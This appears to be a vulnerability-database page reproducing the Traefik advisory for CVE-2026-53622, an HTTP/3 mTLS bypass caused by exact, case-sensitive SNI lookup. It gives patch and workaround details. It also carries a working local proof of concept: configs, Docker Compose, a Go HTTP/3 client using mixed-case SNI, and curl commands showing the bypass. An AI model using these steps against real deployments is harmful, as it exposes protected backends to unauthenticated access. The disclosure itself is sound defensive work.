Traefik CVE-2026-53622
HIGH
GHSA-9cr8-q42q-g8m7
Severity by source
Network-reachable QUIC with no auth or UI (AV:N/PR:N/UI:N); AC:H because exploitation requires a specific non-default configuration combination; scope changes because the TLS-layer auth gate is bypassed to affect a separately-administered backend (S:C); high C/I impact on the protected backend, no availability impact.
Estimated by vuln.today — no official severity rating has been published for this CVE yet.
Lifecycle Timeline
2DescriptionCVE.org
Summary
There is a critical vulnerability in Traefik's HTTP/3 (QUIC) TLS configuration selection that allows unauthenticated clients to bypass router-specific mTLS enforcement. When HTTP/3 is enabled on an entrypoint, the TLS handshake selects the applicable TLS configuration through an exact, case-sensitive lookup on the SNI value, which fails to match wildcard host patterns (e.g., *.example.com) or case variants of the configured hostname. Because the handshake falls back to the default TLS configuration - which may not require client certificates - a client can complete the QUIC handshake without presenting a certificate, while the subsequent HTTP routing layer still dispatches the request to a backend protected by a router-specific mTLS policy. The issue affects deployments where HTTP/3 is enabled, a router uses a wildcard Host rule or case-insensitive hostname matching, a router-specific TLSOptions enforces client certificate authentication, and UDP access to the entrypoint is reachable by an attacker.
Patches
- https://github.com/traefik/traefik/releases/tag/v3.7.3
For more information
If you have any questions or comments about this advisory, please open an issue.
<details> <summary>Original Description</summary>
Summary
Traefik's HTTP/3 TLS configuration selection can ignore router-specific TLSOptions and allow unauthenticated clients to bypass mTLS. The QUIC/HTTP3 path resolves TLS configuration with Router.GetTLSGetClientInfo(), which performs a direct, case-sensitive map lookup on hostHTTPTLSConfig[info.ServerName].
This is inconsistent with the later HTTP host routing semantics, where the same request host can still match wildcard or case-insensitive Host rules after the HTTP/3 TLS handshake has already fallen back to the default TLS configuration. Two exploit paths are confirmed:
Host("*.example.com")withtls.options=mtls: HTTP/2 requires a client certificate, but HTTP/3 reaches the protected backend without one.Host("api.example.com")withtls.options=mtls: HTTP/2 requires a client certificate, but HTTP/3 with mixed-case SNI/Host such asAPI.EXAMPLE.COMreaches the protected backend without one.
Confirmed versions:
- wildcard HTTP/3 bypass:
v3.7.0,v3.7.1 - exact-host mixed-case HTTP/3 bypass:
v3.6.17,v3.7.0,v3.7.1
Details
HTTP/3 installs a QUIC TLS callback in pkg/server/server_entrypoint_tcp_http3.go:
h3.Server = &http3.Server{
Addr: config.GetAddress(),
Port: config.HTTP3.AdvertisedPort,
Handler: httpsServer.Server.(*http.Server).Handler,
TLSConfig: &tls.Config{GetConfigForClient: h3.getGetConfigForClient},
}The callback is wired to the TCP router's TLS selector:
func (e *http3server) Switch(rt *tcprouter.Router) {
e.lock.Lock()
defer e.lock.Unlock()
e.getter = rt.GetTLSGetClientInfo()
}The selector in pkg/server/router/tcp/router.go only performs an exact map lookup:
func (r *Router) GetTLSGetClientInfo() func(info *tls.ClientHelloInfo) (*tls.Config, error) {
return func(info *tls.ClientHelloInfo) (*tls.Config, error) {
if tlsConfig, ok := r.hostHTTPTLSConfig[info.ServerName]; ok {
return tlsConfig, nil
}
return r.httpsTLSConfig, nil
}
}That creates two mismatches:
- wildcard keys such as
*.example.comare never matched forapi.example.com - lower-case router keys such as
api.example.comare not matched for mixed-case SNI such asAPI.EXAMPLE.COM
On the later HTTP request path, the same host can still match wildcard or case-insensitive Host rules through the muxer. The HTTP/3 TLS handshake path falls back to the default TLS config before that routing decision happens. If the default TLS config does not require a client certificate, the QUIC handshake succeeds without mTLS, and the later HTTP router still routes to the protected backend.
Preconditions:
- HTTP/3 is enabled on the affected entrypoint.
- A router-specific
TLSOptionsconfiguration enforces client certificate authentication. - The default/fallback TLS configuration does not require client certificates.
- UDP access to the HTTP/3 entrypoint is reachable by the attacker.
Minimal wildcard dynamic configuration:
http:
routers:
protected:
rule: Host(`*.example.com`)
service: protected
tls:
options: mtls
services:
protected:
loadBalancer:
servers:
- url: http://protected:80
tls:
certificates:
- certFile: /certs/server.crt
keyFile: /certs/server.key
options:
mtls:
clientAuth:
caFiles:
- /certs/ca.crt
clientAuthType: RequireAndVerifyClientCertMinimal exact-host dynamic configuration:
http:
routers:
protected:
rule: Host(`api.example.com`)
service: protected
tls:
options: mtls
services:
protected:
loadBalancer:
servers:
- url: http://protected:80
tls:
certificates:
- certFile: /certs/server.crt
keyFile: /certs/server.key
options:
mtls:
clientAuth:
caFiles:
- /certs/ca.crt
clientAuthType: RequireAndVerifyClientCertMinimal Docker Compose:
services:
traefik:
image: traefik:v3.7.1
command:
- --log.level=DEBUG
- --entrypoints.websecure.address=:8443
- --entrypoints.websecure.http3
- --providers.file.filename=/etc/traefik/dynamic.yml
- --providers.file.watch=false
ports:
- "8443:8443/tcp"
- "8443:8443/udp"
volumes:
- ./dynamic.yml:/etc/traefik/dynamic.yml:ro
- ./certs:/certs:ro
depends_on:
- protected
protected:
image: traefik/whoami:v1.11
command:
- --name=PROTECTEDCertificate generation:
rm -rf certs
mkdir -p certs
openssl req -x509 -newkey rsa:2048 -nodes -days 7 -keyout certs/ca.key -out certs/ca.crt -subj "/CN=traefik-poc-ca"
openssl req -newkey rsa:2048 -nodes -keyout certs/server.key -out certs/server.csr -subj "/CN=api.example.com" -addext "subjectAltName=DNS:api.example.com,DNS:*.example.com"
openssl x509 -req -in certs/server.csr -CA certs/ca.crt -CAkey certs/ca.key -CAcreateserial -out certs/server.crt -days 7 -sha256 -copy_extensions copyallThe mixed-case HTTP/3 client used for the exact-host case:
package main
import (
"crypto/tls"
"fmt"
"io"
"net/http"
"os"
"time"
"github.com/quic-go/quic-go/http3"
)
func main() {
serverName := os.Getenv("TLS_SERVER_NAME")
if serverName == "" {
serverName = "API.EXAMPLE.COM"
}
host := os.Getenv("HTTP_HOST")
if host == "" {
host = "API.EXAMPLE.COM"
}
tr := &http3.Transport{
TLSClientConfig: &tls.Config{
ServerName: serverName,
InsecureSkipVerify: true,
},
}
defer tr.Close()
client := &http.Client{Transport: tr, Timeout: 8 * time.Second}
req, err := http.NewRequest(http.MethodGet, "https://127.0.0.1:8443/", nil)
if err != nil {
panic(err)
}
req.Host = host
resp, err := client.Do(req)
if err != nil {
fmt.Fprintln(os.Stderr, err)
os.Exit(1)
}
defer resp.Body.Close()
fmt.Println(resp.Proto, resp.StatusCode)
body, _ := io.ReadAll(resp.Body)
fmt.Print(string(body))
}PoC
Wildcard bypass:
- Start Traefik with the wildcard dynamic configuration above.
- Control over TCP/TLS:
curl --noproxy '*' --http2 -skv --resolve api.example.com:8443:127.0.0.1 https://api.example.com:8443/Observed result:
TLS alert ... certificate required- HTTP/3 bypass:
curl --noproxy '*' --http3-only -skv --resolve api.example.com:8443:127.0.0.1 https://api.example.com:8443/Observed result:
HTTP/3 200
Name: PROTECTED
Host: api.example.com:8443Exact-host mixed-case bypass:
- Start Traefik with the exact-host dynamic configuration above.
- Control over TCP/TLS:
curl --noproxy '*' --http2 -skv --resolve api.example.com:8443:127.0.0.1 https://api.example.com:8443/Observed result:
TLS alert ... certificate required- Mixed-case HTTP/2 control:
curl --noproxy '*' --http2 -skv --resolve API.EXAMPLE.COM:8443:127.0.0.1 https://API.EXAMPLE.COM:8443/Observed result:
TLS alert ... certificate requiredThis control confirms that the bypass is specific to the HTTP/3 TLS configuration selection path in this test setup. The HTTP/2 request to the same mixed-case hostname still fails with certificate required.
- HTTP/3 bypass with the same mixed-case hostname:
TLS_SERVER_NAME=API.EXAMPLE.COM HTTP_HOST=API.EXAMPLE.COM go run ./h3-case-client.goObserved result:
HTTP/3.0 200
Name: PROTECTED
Host: API.EXAMPLE.COMLocal regression tests used during validation:
go test ./pkg/server/router/tcp -run 'TestGetTLSGetClientInfo_(WildcardCurrentBehavior|ExactHostCaseSensitivityCurrentBehavior)$' -count=1These tests were added locally during analysis to demonstrate the current behavior of GetTLSGetClientInfo(). They are not required to reproduce the issue; the Docker and curl/HTTP3 commands above are the end-to-end reproduction.
Version matrix observed with Docker images:
wildcard H3 bypass: affected on v3.7.0 and v3.7.1
exact-case H3 bypass: affected on v3.6.17, v3.7.0, and v3.7.1The wildcard case was tested on v3.7.x because wildcard Host / HostSNI matching and TLSOptions association for wildcard domains were introduced in v3.7.0.
Impact
Deployments that use router TLSOptions as an access-control boundary for HTTP/3 can expose protected backends without client authentication.
The highest-impact case is mTLS:
- normal HTTP/2/TCP access to the protected host requires a client certificate
- HTTP/3 access to the same route falls back to the default TLS config
- the request is then routed to the protected backend without satisfying the route's mTLS policy
This can expose confidential data or privileged backend operations to unauthenticated network clients. The issue is especially severe because it does not require credentials, user interaction, or a prior foothold.
Possible workarounds until a fix is available:
- Disable HTTP/3 on entrypoints that rely on router-specific mTLS.
- Enforce mTLS in the default TLS options as well, so fallback TLS configuration is not weaker than router-specific configuration.
- Block UDP access to the HTTP/3 entrypoint.
- Enforce client authentication at an additional layer behind Traefik.
</details>
---
Articles & Coverage 2
AnalysisAI
Authentication bypass in Traefik v3.6.17, v3.7.0, and v3.7.1 allows unauthenticated remote attackers to bypass router-specific mTLS enforcement when HTTP/3 (QUIC) is enabled, exposing protected backends to unauthenticated network clients. The flaw stems from a case-sensitive, exact-match SNI lookup that fails to resolve wildcard host patterns or mixed-case hostnames, causing the QUIC handshake to fall back to a default TLS configuration that does not require client certificates. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires all of the following deployment-specific conditions: (1) HTTP/3 explicitly enabled on the affected entrypoint (e.g., --entrypoints.websecure.http3), (2) at least one router that uses either a wildcard Host rule such as Host(`*.example.com`) or relies on case-insensitive hostname matching, (3) a router-specific TLSOptions block enforcing clientAuthType: RequireAndVerifyClientCert, (4) the default/fallback TLS options NOT requiring client certificates, and (5) UDP reachability to the HTTP/3 entrypoint from the attacker. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | No NVD CVSS vector was provided and the advisory does not include an EPSS score or KEV listing, so quantitative exploitation probability is unknown; however, the vendor explicitly labels this 'critical' and the qualitative signals are strong: no authentication, no user interaction, network-reachable UDP entrypoint, and a fully detailed PoC including Docker Compose, certificates, and a Go client. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker with network reachability to the Traefik entrypoint's UDP port (typically 443/udp or 8443/udp) connects over HTTP/3 to a hostname matched by a wildcard router rule such as Host(`*.example.com`) - or to an exact-match router using a mixed-case SNI like API.EXAMPLE.COM - and completes the QUIC TLS handshake without presenting any client certificate, because the case-sensitive exact SNI lookup misses the configured TLSOptions and falls back to the default TLS config. The subsequent HTTP request is then routed by the muxer (which honors wildcard and case-insensitive Host rules) to the mTLS-protected backend, granting unauthenticated access to confidential data or privileged backend operations. … |
| Remediation | Vendor-released patch: Traefik v3.7.3, available at https://github.com/traefik/traefik/releases/tag/v3.7.3, which also bundles fixes for CVE-2026-48020 and CVE-2026-48491. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
24 hours: Disable HTTP/3 (QUIC) in all affected Traefik instances (v3.6.17, v3.7.0, v3.7.1); conduct configuration audit to verify TLS-only operation. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
More from same product – last 7 days
Authentication bypass in dhax/go-base Go REST API boilerplate (versions prior to commit cc82b974, merged May 17, 2026) a
Cryptographic primality validation in Deno's Node.js compatibility layer (versions <= 2.8.0) silently skips Miller-Rabin
mTLS bypass in Traefik 3.7.0-3.7.1 lets unauthenticated remote clients reach backends protected by wildcard-router TLSOp
Share
External POC / Exploit Code
Leaving vuln.today